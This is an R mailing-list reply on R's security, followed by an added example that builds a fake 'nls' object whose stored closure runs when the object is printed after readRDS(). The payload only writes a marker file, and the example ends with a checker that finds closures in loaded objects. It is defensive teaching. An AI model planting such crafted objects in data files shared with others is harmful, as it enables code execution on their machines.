On Tue, 5 Oct 2021 22:20:33 +0000
Thomas Subia <thomas.subia at fmindustries.com> wrote:
> Some co-workers are wondering about how secure R software is.
I'm afraid that this question is too hard to answer without their
threat model. Secure against what, specifically?
> Is there any documentation on this which I can forward to them?
Well, R is a programming language. It's Turing-complete (see halting
problem), will happily run machine code from shared objects (see
dyn.load, .C, .Call), and install.packages() is there to download
third-party code from the Internet. But that's the case with all
programming languages I know that are used for statistics, which aren't
supposed to run untrusted code.
Maybe you're concerned about data input/output instead. Functions are
first-class objects, so it's possible to save and load them from data
files. Not sure if there's a way to run code on data load, but you can
do it on print() (e.g. print.nls(x) calling x$m$getAllPars()), so don't
load()/readRDS() untrusted data files. There are known bugs in the
deserialiser, too: https://bugs.r-project.org/show_bug.cgi?id=16034
Don't know if it's documented anywhere, though. What are your
co-workers concerned about?
--
Best regards,
Ivan
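The print() case Ivan describes, as an added example that is not part of the original message: an attacker-crafted object with class "nls" whose closures are called by R's own print.nls() the moment the victim looks at it. The marker file, the fake model's field names and the find_closures() helper are my constructions for illustration; only the fact that print.nls() calls formula(x), x$m$getAllPars() and x$m$deviance() comes from R itself (the tail of print.nls() differs a little between R versions, so the print is wrapped in try()).

```r
## Added example (not from the original post): a deserialised R object that
## runs code when printed, plus a check to run before auto-printing anything
## loaded from an untrusted .rds/.RData file.

marker <- file.path(tempdir(), "payload-ran.txt")   # constructed, harmless stand-in for real damage
unlink(marker)

## 1. Attacker side: build a fake "nls" object. print.nls() calls
##    formula(x) -> x$m$formula(), then x$m$getAllPars(), then x$m$deviance().
##    The payload sits in getAllPars(); it fires as soon as that call is reached.
evil <- structure(
  list(
    m = list(
      formula    = function() y ~ a * x,
      getAllPars = function() {
        # A real payload would be system("..."); this one just leaves a marker.
        writeLines(paste("code ran as", Sys.info()[["user"]]),
                   file.path(tempdir(), "payload-ran.txt"))
        c(a = 1)                      # look like a fitted parameter
      },
      deviance   = function() 0
    ),
    data     = quote(dat),
    convInfo = NULL
  ),
  class = "nls"
)
path <- tempfile(fileext = ".rds")
saveRDS(evil, path)                   # closures serialise fine; this is the "data file"
rm(evil)

## 2. Victim side: readRDS() itself runs nothing, but printing the result does.
obj <- readRDS(path)
file.exists(marker)                   # FALSE: deserialising alone was harmless here
try(print(obj))                       # print.nls() -> x$m$getAllPars() -> payload
file.exists(marker)                   # TRUE
readLines(marker)

## 3. A check to run before ever auto-printing an object from an untrusted file:
##    walk lists and attributes and report every closure it carries.
##    (Environments are reported but not entered; a closure hidden in one would
##    show up as the environment itself.)
find_closures <- function(x, path = "obj") {
  hits <- character()
  if (is.function(x))    hits <- c(hits, path)
  if (is.environment(x)) hits <- c(hits, paste0(path, " <environment>"))
  if (is.list(x)) {
    nms <- if (is.null(names(x))) seq_along(x) else names(x)
    for (i in seq_along(x))
      hits <- c(hits, find_closures(x[[i]], paste0(path, "$", nms[i])))
  }
  for (a in names(attributes(x)))
    hits <- c(hits, find_closures(attr(x, a), sprintf('attr(%s, "%s")', path, a)))
  hits
}

find_closures(obj)      # "obj$m$formula" "obj$m$getAllPars" "obj$m$deviance"
find_closures(mtcars)   # character(0): plain data carries no code
class(obj)              # "nls": a class you did not expect in a "data" file is itself a warning sign
```

Typing `obj` at the console auto-prints and is exactly as dangerous as `print(obj)`; assigning the result of readRDS()/load() and inspecting it with class(), unclass() or a walker like the one above first is the only safe order. The same applies to any S3/S4 class whose methods (print, summary, format, plot) call a closure stored in the object, not just "nls".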